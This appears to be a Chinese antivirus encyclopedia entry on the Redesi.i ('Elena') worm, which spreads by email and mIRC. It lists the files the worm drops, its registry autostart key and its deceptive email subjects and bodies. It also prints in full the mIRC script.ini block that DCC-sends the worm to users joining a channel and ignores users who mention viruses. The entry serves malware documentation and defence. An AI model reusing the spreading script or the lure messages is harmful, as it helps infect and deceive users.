病毒名称(中文):
红丝带变种I
病毒别名:
I-Worm.Redesi.i[AVP],I-Worm/Redesi.i[KV],Worm.Re
威胁级别:
★★☆☆☆
病毒类型:
蠕虫病毒
病毒长度:
40960
影响系统:
Win9xWinNT
病毒行为:
这是一个通过电子邮件和mIRC聊天系统传播的蠕虫病毒。该病毒发作的时候将7个病毒副本和1张名为“Elena”的照片拷贝到C盘根目录下,在注册表中添加启动项,实现病毒的开机自启动。通过修改mIRC的脚本配置文件script.ini的内容,使得病毒能够通过mIRC来传播。该病毒在OutlookExpress的地址薄里收集邮件地址,再将病毒做为附件发送出去,该邮件极具欺骗性,用户很可能会受骗而去打开附件,从而感染该病毒。
病毒释放的8个文件(7个病毒副本和1张Elena的照片):
1)在C盘根目录下释放以下文件:
C:\elena.jpg(一人物图片)
C:\elena.scr(病毒副本)
C:\YouandMe.exe(病毒副本)
C:\Me.pif(病毒副本)
C:\Mylove.pif(病毒副本)
C:\myfullpicture.scr(病毒副本)
C:\aboutme.exe(病毒副本)
C:\you.exe(病毒副本)
2)在注册表中添加启动项:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
(Default)="C:\me.pif"
3)取下面的某一行做为邮件主题:
Heybaby!
Shemakesmefeelaliveherpowermorethanwordscansay.
Sendsshiversthroughmyperson,clearsmyheadtofacetheday.
Can"twesortthisout?
Iwaswrong,I"msorry.
IknowIwasabitch
Webelongtogether
Can"tresist,thatswherewewentwrong.
Iheartheoceanbeatupontheshoreoutsidemyroom.
Callingmeupfromsleeptolistentohergracefulltune.
It"sgonnabealovelyday.
Don"taskmewhatIsmoke.ButIdrinktogetdrunk.
Ikeptwatchingthewayyoumove.
SeasideAtmosphere.
Twopeople,barelytocuhingeachother.
4)取下面的某一段做为邮件的正文:
Heybaby
SorryIwassuchabitchtoyou.Istherenowaywecansortthisout?
Thelastfewdayshavebeenhellwithoutyou...Imissyou
I"veattachedapicture...thoughtyoumightlikeit.
Pleasecallme!
Allmylove.Elena
Heydarlin
I"llbehomeinafewdays,can"twaittoseeyouagain;-)
AttachedapicturewetookonSaturdayatGatecrasher.Loveya
Elena=x=
Hisexy.
WenttoGatecrasheronSaturday,itwasabsoultlybrilliant!!!
hereisapictureofmebythebar(asusualheh)
Behometommorrow.
LoveElena
5)向mIRC的脚本配置文件script.ini中写入以下内容,使得病毒能够通过mIRC来传播:
[script]
n0=on1:JOIN:#:{
n1=.msg$nickHey.checkoutmypictureandletmeknowwhatyouthink.Youllbepleasantlysuprised.
n2=.copyC:\elena.scrC:\mirc\MyFullpic.jpg.pif
n3=.dccsend$nickC:\mirc\MyFullpic.jpg.pif
n4=}
n5=on1:text:*script.ini*:?:/.ignore$nick
n6=on1:text:*virus*:?:/.ignore$nick
n7=on1:text:*worm*:?:/.ignore$nick
n8=on1:text:*script.ini*:#:/.ignore$nick
n9=on1:text:*virus*:#:/.ignore$nick
n10=on1:text:*worm*:#:/.ignore$nick
n11=on1:text:*redesi*:#:/nickElena_MM
n12=on1:text:*elena*:#:/nickI_got_worms
n13=on1:text:*sex*:#:/nickElena_worm
n14=on1:text:*cyber*:#:/nickWin32_Elena
n14=on1:text:*e*:#:/meThinksElenaisstunning.
n14=on1:text:*a*:#:/join#teamvirus
n14=on1:text:*s*:#:/saymynextwormwillbecalledZorprobably:)
n14=on1:text:*i*:#:/join#teamvirus
n14=on1:text:*hey*:#:/sayW32.Elena,byGobo